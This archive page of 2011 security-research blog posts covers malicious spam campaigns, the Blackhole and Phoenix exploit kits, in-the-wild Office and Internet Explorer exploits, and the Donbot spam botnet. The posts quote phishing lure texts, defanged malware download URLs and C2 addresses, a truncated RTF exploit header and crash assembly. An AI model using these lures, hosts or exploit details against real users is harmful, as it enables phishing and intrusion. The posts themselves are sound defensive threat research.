Archive for 2011

« Older Entries
Newer Entries »
View All Malware

Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links.  However, there are clues it is fake.  The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

 

By contrast, here is a legitimate Facebook friend request.

 

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

 

 

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

 

Tags:    |    |    |    |    |  

View All Spam

Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

 

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

 

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

 

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags:    |    |    |  

View All Spam

Malicious hotel transaction spam

By Gavin Neale  •  July 29th, 2011  •   Spam

Over the past couple of days we have been seeing numerous spam emails which claim that a wrong transaction was made on your credit card from a hotel.
The subject lines look similar to the following two subjects, with varying hotels

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that in order to get your money back you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament

 

Attached is a Zip file named RefundFormXXX.zip, where XXX is a random three digit number. Inside this Zip file is an executable file; Refund-Form.exe which has an icon likely intended to deceive unsuspecting victims into thinking that it is in fact some type of form which they can view.

The executable inside the 'RefundForm' Zip file

 

Once executed this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). This did not run straight away so we ran it on a separate test machine and verified that this is a fake AV product named ‘Security Protection’.

A further HTTP request is sent to 188.72.202.121, shown below, which requests a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer

 

The file that is retrieved, called ‘update.dat’ is in fact an encrypted Windows dll file. Once decrypted we discovered that it was a password stealer which targets a huge number of applications including instant messaging programs, poker clients, FTP clients and web browsers looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.

 

Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent which downloaded the file 1036.exe.

HTTP download of 1036.exe

 

Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable files and those that were downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.

 

Thanks to Rodel Mendrez for his investigation into the password stealer component.

View All Cybercrime

Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron  •  July 5th, 2011  •   Cybercrime

During the last few weeks we’ve seen massive use of the CVE-2010-3333 vulnerability for Microsoft Office. This eight months old vulnerability is used in popular documents such as a document that pretends to be “President Obama’s Speech”.

Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found at mitre CVE-2010-3333

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka “RTF Stack Buffer Overflow Vulnerability.”

As we can see there is an exploit that is a part of the Metasploit exploit framework:


Figure 1 – Metasploit main page

The vulnerability is actually an .RTF file type vulnerability but can be launched by using a .DOC file (not an actual .DOC file but a .DOC extension).

Figure 2 – Part of the exploit from Metasploit

 

CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here we can see the text view of the file and we can clearly see that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Lets examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample

 

Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The { \shp ………… control word is followed by { \*\shpinst  Following the { \*\shpinst   is a list of all the properties of a shape. Each of the properties is in the following format:

{ \sp  { \sn PropertyName } { \sv PropertyValueInformation } }

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

We see that it’s an .RTF file type, that contains a “sn” (Designates paragraph style.) with a PropertyName “pFragments” (Fragments are optional, additional parts to the shape. They allow the shape to contain multiple paths and parts. This property lists the fragments of the shape.). After that, we see a “sv” that contains a value, a semicolon and a second value followed by a second semicolon and a third value. The third value is the cause of the buffer overflow.

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…

 

ASM Info:

30e9eb72 81e1ffff0000       and     ecx,0FFFFh

30e9eb78 56                           push    esi

30e9eb79 8bf1                       mov     esi,ecx

30e9eb7b 0faf742414          imul    esi,dword ptr [esp+14h]

30e9eb80 037010                 add     esi,dword ptr [eax+10h]

30e9eb83 8bc1                      mov     eax,ecx

30e9eb85 c1e902                  shr     ecx,2

30e9eb88 f3a5                       rep movs dword ptr es:[edi],dword ptr [esi] ; Overflow!

30e9eb8a 8bc8                       mov     ecx,eax

30e9eb8c 83e103                  and     ecx,3

30e9eb8f f3a4                        rep movs byte ptr es:[edi],byte ptr [esi]

30e9eb91 5e                           pop     esi

30e9eb92 5f                            pop     edi

30e9eb93 c20c00                  ret     0Ch

 

Debugger info:

(100.3f8): Access violation – code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000

eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

…[SNIP]…

mso!Ordinal6426+0x64d:

30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

 

In-The-Wild Samples

Here are few of the samples that we’ve found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.

Tags:    |    |    |    |    |    |    |    |    |    |  

View All Spam

Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a zip file disguised as a credit card statement. Extracting the Zip file reveals a Trojan downloader executable file that uses a Adobe PDF icon. When the executable is run it downloads a fake anti-virus executable from the following url:

http://mysteryforyou1[dot]ru/pusk.exe


The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.

Tags:    |    |    |    |    |    |  

View All CybercrimeView All MalwareView All Vulnerabilities

0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider  •  June 26th, 2011  •   Cybercrime Malware Vulnerabilities

Time Element Memory Corruption – a remote code execution vulnerability, recently patched by Microsoft as part of MS11-050, bearing the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255 is being actively exploited in the wild.

M86 Security Labs team was contacted and asked to inspect the URL of a legitimate website of a large private company that was blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.

The page looked benign, but inspecting each included JavaScript code, we saw that one of them:

Was injecting an iframe:

pointing to a malicious page that was very easilty classified as malicious due to shellcode patterns being part of the page’s DOM:

So, just another infected site – big deal right? But, after further inspection, we saw that it exploited an un-published security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE and saw a crash followed by execution of malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty, that the anonymous researcher who according to Microsoft’s security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, had used the vulnerability details for malicious purposes, as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique that bypasses security software that doesn’t act as an actual browser, and where their script engine does not have access to the actual DOM.

It turns out that one of the side-effects of hiding data inside DIV elements is that it makes the data indexable by search engines.

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Not to mention the service of caching samples for us, it’s ironic that an attacker’s obfuscation technique can be used against him to find his infection servers using a simple Google search. :)

Tags:    |    |    |  

View All Cybercrime

Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really useable, as it required activating by the author of the exploit kit. It contains an activation page that is being used to load all the exploits to the server for every specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo

Phoenix Exploit’s Kit 2.7 logo

The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.

Read More

Tags:    |    |    |  

View All Malware

Malicious LinkedIn Campaign

By Phil Hay  •  June 3rd, 2011  •   Malware

We are currently seeing a malicious spam campaign purporting to be a notification from LinkedIn.  The messages look realistic, but the giveaway is the bogus link exposed when you hover over the confirm button.

The bogus link salesforceappi[dot]com leads off to a server hosting an exploit kit, which automatically attempts to load malware onto the victim’s computer by using one of a number of ‘canned’ exploits targeting known vulnerabilities.

The campaign is very similar to one we saw last September, also using LinkedIn and also leading to an Exploit Kit.  Real notifications from these sorts of social networking sites are commonplace and the bad guys are preying on this. Remember, just because it looks legit, doesn’t mean it is.

Update: 7 June

After some investigation, we identified the exploit kit as the Blackhole kit, and managed to gain access to its control panel.  Below is an interesting statistics page that shows:

  • Successful malware ‘loads’ at 17.55%
  • Successful loads against most browsers, with Internet Explorer at the top with 28.25% of loads
  • Successful loads on a range of operating systems
  • Java exploits account for 80% of successful loads, and PDF exploits account for a further 12%.

The moral of the story is to keep your software updated, impeccably, at all times.  Particularly Java and PDF readers.

 

Thanks to Daniel Chechik who assisted with details on the Blackhole Exploit kit.

Tags:    |    |    |    |  

View All Spam

New Bots, Old Bots II: Donbot

By Phil Hay  •  June 2nd, 2011  •   Spam

Last week we blogged about the rise of two botnets in our spam statistics and provided details of Xarvester. Today, we take a closer look at the other botnet in question: Donbot.

Donbot has been around for about three years but lately has surged to the top of our spam statistics chart with masses of dating and gambling spam. We recently found a suitable sample (VirusTotal report) and took a look.

When executed, the malware immediately contacted its control server at 91.212.135.158 on port 80 and did the following POST request:

POST /gateway/index HTTP/1.0

The server replied NO_TASK_WAIT.  And wait we did – for a long time with the bot checking in like this roughly every 20 minutes.  Then after two days the server suddenly sprang into life and responded with a download file svchosta.exe (VirusTotal report):

 

This led to the installation of the Donbot spamming component, where four similar processes were spawned on the infected host.  These executables were all dropped in the c:\documents and settings\administrator\application data folder on our Windows XP host:

The four processes were all spamming simultaneously.  When we killed some of the processes, the bot simply spawned more copies to replace them.  The combined spam output rate was quite impressive, we measured 1800 messages per minute (108,000 messages per hour) in our lab. Before anyone thinks we’re spamming, rest assured that these messages were all captured by our spam sinkhole servers.  This kind of spamming rate quickly leads to big numbers.  For example, take a botnet of just 1000 bots, multiply that by 108,000 messages per hour and assume each host is spamming for 8 hours per day, and you get a spamming machine capable of over 800 million spam messages per day.

The control instructions and reports between the bot and its control server are all communicated in plain text.  Here, for example is part of the template used in the gambling spam campaign we discussed last week.

 

Donbot also sends regular reports back to the server, which includes success rates and whether the host may be blacklisted at any IP blacklist (RBL).  Below you can see two characteristics of Donbot traffic – the HALLO and CHUNK:

The success of sending to individual email addresses is also recorded, so that the operator can continually clean his email address lists of ‘bad’ addresses.

In amongst the template instructions, there is also a bunch of text which looks like it is pulled from a Wiki somewhere. Although we didn’t see it being used in the gambling campaign, this may be for inserting random text into spam messages.

All this is very similar to what we have seen before from Donbot (see our original write up here). What’s interesting is its sudden rise from obscurity and its high output per host. Why build a new fancy spamming botnet when you simply tweak some old ones?

Tags:    |    |    |    |  

View All Spam

Donbot’s “Money Maker” Gambling Scheme

By David Broome  •  May 26th, 2011  •   Spam

Last week, we observed the Donbot botnet changed its spam campaign to one promoting online casinos. The barrage of of Fake AV we saw coming out of Donbot suddenly stopped and within 15 minutes we started receiving this new campaign.

The theme of the campaign is not entirely new, as it is one we have seen for over a year on and off in our spam traps. It is designed to encourage the reader to gamble money on roulette with what is presented as a ‘winning strategy’. Conveniently, a link to an online casino is provided to the user in order to use this strategy and make ‘easy money’.

Read More

Tags:    |    |    |    |  

« Older Entries
Newer Entries »